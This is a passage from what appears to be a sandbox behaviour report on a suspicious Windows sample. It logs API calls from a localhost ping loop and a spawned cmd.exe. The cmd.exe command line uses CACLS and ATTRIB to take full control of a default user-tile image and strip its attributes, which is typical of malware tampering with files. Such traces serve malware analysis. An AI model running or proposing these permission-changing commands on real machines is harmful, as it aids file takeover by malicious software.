[0188.012] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0188.012] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0188.012] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0188.012] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0188.012] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0188.012] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0188.012] LocalFree (hMem=0x2c51e0) returned 0x0 [0188.012] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0188.012] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0188.012] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0188.012] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0188.012] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0188.013] LocalFree (hMem=0x2c2a10) returned 0x0 [0188.013] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0188.013] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0188.013] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0188.013] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | 
out: _Buf=0x2c8f90*) returned 2 [0188.013] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0188.013] LocalFree (hMem=0x2c8f90) returned 0x0 [0188.013] Sleep (dwMilliseconds=0x3e8) [0189.081] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0189.094] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0189.094] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0189.094] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0189.094] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0189.094] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0189.094] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0189.094] LocalFree (hMem=0x2c51e0) returned 0x0 [0189.094] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0189.094] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0189.094] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0189.094] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0189.095] _setmode (_FileHandle=1, _Mode=16384) returned 32768 
[0189.095] LocalFree (hMem=0x2c2a10) returned 0x0 [0189.095] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0189.095] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0189.095] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0189.095] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0189.095] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0189.095] LocalFree (hMem=0x2c8f90) returned 0x0 [0189.095] Sleep (dwMilliseconds=0x3e8) [0190.118] Icmp6SendEcho2 (in: IcmpHandle=0x2c8bb0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0xcf780, DestinationAddress=0x1a55e0, RequestData=0x2c38f0, RequestSize=0x20, RequestOptions=0xcf730, ReplyBuffer=0x2cec28, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2cec28) returned 0x1 [0190.130] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcfc04, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0190.130] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcf708, nSize=0x0, Arguments=0xcf704 | out: lpBuffer="\xe0\x51\x2c") returned 0x10 [0190.130] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2c51e0, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0190.130] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0190.130] _write (in: _FileHandle=1, _Buf=0x2c51e0*, _MaxCharCount=0x10 | out: _Buf=0x2c51e0*) returned 16 [0190.130] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0190.130] LocalFree (hMem=0x2c51e0) returned 0x0 [0190.130] FormatMessageA (in: dwFlags=0x900, 
lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x10*,") returned 0x9 [0190.130] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2c2a10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0190.130] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0190.130] _write (in: _FileHandle=1, _Buf=0x2c2a10*, _MaxCharCount=0x9 | out: _Buf=0x2c2a10*) returned 9 [0190.130] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0190.130] LocalFree (hMem=0x2c2a10) returned 0x0 [0190.130] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0xcf70c, nSize=0x0, Arguments=0xcf708 | out: lpBuffer="\x90\x8f\x2c") returned 0x2 [0190.130] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2c8f90, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0190.130] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0190.131] _write (in: _FileHandle=1, _Buf=0x2c8f90*, _MaxCharCount=0x2 | out: _Buf=0x2c8f90*) returned 2 [0190.140] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0190.140] LocalFree (hMem=0x2c8f90) returned 0x0 [0190.140] getnameinfo (in: pSockaddr=0x1a55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xcf6d0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0190.140] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xcf6a0, nSize=0x0, Arguments=0xcf69c | out: lpBuffer="\x88\x15\x2d") returned 0x58 [0190.140] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", lpszDst=0x2d1588, cchDstLength=0x58 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n") returned 1 [0190.140] _setmode (_FileHandle=1, 
_Mode=32768) returned 16384 [0190.140] _write (in: _FileHandle=1, _Buf=0x2d1588*, _MaxCharCount=0x58 | out: _Buf=0x2d1588*) returned 88 [0190.141] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0190.141] LocalFree (hMem=0x2d1588) returned 0x0 [0190.141] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xcf6b0, nSize=0x0, Arguments=0xcf6ac | out: lpBuffer="\x98\x15\x2d") returned 0x61 [0190.141] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x2d1598, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0190.141] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0190.141] _write (in: _FileHandle=1, _Buf=0x2d1598*, _MaxCharCount=0x61 | out: _Buf=0x2d1598*) returned 97 [0190.141] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0190.141] LocalFree (hMem=0x2d1598) returned 0x0 [0190.141] IcmpCloseHandle (IcmpHandle=0x2c8bb0) returned 1 [0190.158] LocalFree (hMem=0x2c38f0) returned 0x0 [0190.158] LocalFree (hMem=0x2cec28) returned 0x0 [0190.158] WSACleanup () returned 0 [0190.411] exit (_Code=0) Thread: id = 443 os_tid = 0x390 Thread: id = 444 os_tid = 0xc08 Thread: id = 446 os_tid = 0xa6c Process: id = "328" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain 
Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24894 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24895 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24896 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24897 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 24898 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24899 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24900 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24901 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24902 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 24903 start_va = 0x7ffdf000 end_va = 
0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24942 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24943 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24944 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24945 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 24946 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 24947 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24948 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24949 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24950 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24951 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24952 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24953 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24954 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24955 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24956 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 24957 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24958 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24959 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 24960 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 24961 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 24962 
start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 24963 start_va = 0x570000 end_va = 0x670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 24964 start_va = 0x680000 end_va = 0x127ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 24965 start_va = 0x1280000 end_va = 0x13e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Region: id = 24968 start_va = 0x13f0000 end_va = 0x16befff entry_point = 0x13f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 442 os_tid = 0xc50 [0178.932] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afaac | out: lpSystemTimeAsFileTime=0x1afaac*(dwLowDateTime=0xa04f1900, dwHighDateTime=0x1d440a9)) [0178.932] GetCurrentProcessId () returned 0xa14 [0178.932] GetCurrentThreadId () returned 0xc50 [0178.932] GetTickCount () returned 0x33bd7 [0178.932] QueryPerformanceCounter (in: lpPerformanceCount=0x1afaa4 | out: lpPerformanceCount=0x1afaa4*=23572117032) returned 1 [0178.933] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0178.933] __set_app_type (_Type=0x1) [0178.933] __p__fmode () returned 0x76b331f4 [0178.933] __p__commode () returned 0x76b331fc [0178.933] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0178.933] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0178.933] GetCurrentThreadId () returned 0xc50 [0178.933] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc50) returned 0x38 [0178.933] GetModuleHandleW 
(lpModuleName="KERNEL32.DLL") returned 0x76910000 [0178.933] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0178.933] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.934] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0178.934] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa3c | out: phkResult=0x1afa3c*=0x0) returned 0x2 [0178.934] VirtualQuery (in: lpAddress=0x1afa73, lpBuffer=0x1afa0c, dwLength=0x1c | out: lpBuffer=0x1afa0c*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.934] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa0c, dwLength=0x1c | out: lpBuffer=0x1afa0c*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0178.934] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa0c, dwLength=0x1c | out: lpBuffer=0x1afa0c*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0178.934] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa0c, dwLength=0x1c | out: lpBuffer=0x1afa0c*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.934] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa0c, dwLength=0x1c | out: lpBuffer=0x1afa0c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0178.934] GetConsoleOutputCP () returned 0x1b5 [0178.934] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.934] SetConsoleCtrlHandler 
(HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0178.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.934] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0178.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.934] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.935] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.935] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.935] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.935] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.935] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0178.935] GetEnvironmentStringsW () returned 0x2e0308* [0178.935] FreeEnvironmentStringsW (penv=0x2e0308) returned 1 [0178.936] GetEnvironmentStringsW () returned 0x2e0308* [0178.936] FreeEnvironmentStringsW (penv=0x2e0308) returned 1 [0178.936] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9ac | out: phkResult=0x1ae9ac*=0x40) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0xb8, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x1, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0x1, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, 
lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x0, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x40, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x40, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0x40, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegCloseKey (hKey=0x40) returned 0x0 [0178.936] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9ac | out: phkResult=0x1ae9ac*=0x40) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0x40, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x1, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0x1, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: 
lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x0, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x9, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x4, lpData=0x1ae9b8*=0x9, lpcbData=0x1ae9b0*=0x4) returned 0x0 [0178.936] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9b4, lpData=0x1ae9b8, lpcbData=0x1ae9b0*=0x1000 | out: lpType=0x1ae9b4*=0x0, lpData=0x1ae9b8*=0x9, lpcbData=0x1ae9b0*=0x1000) returned 0x2 [0178.936] RegCloseKey (hKey=0x40) returned 0x0 [0178.936] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638e [0178.936] srand (_Seed=0x5b88638e) [0178.936] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"" [0178.937] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"" [0178.937] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.937] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: 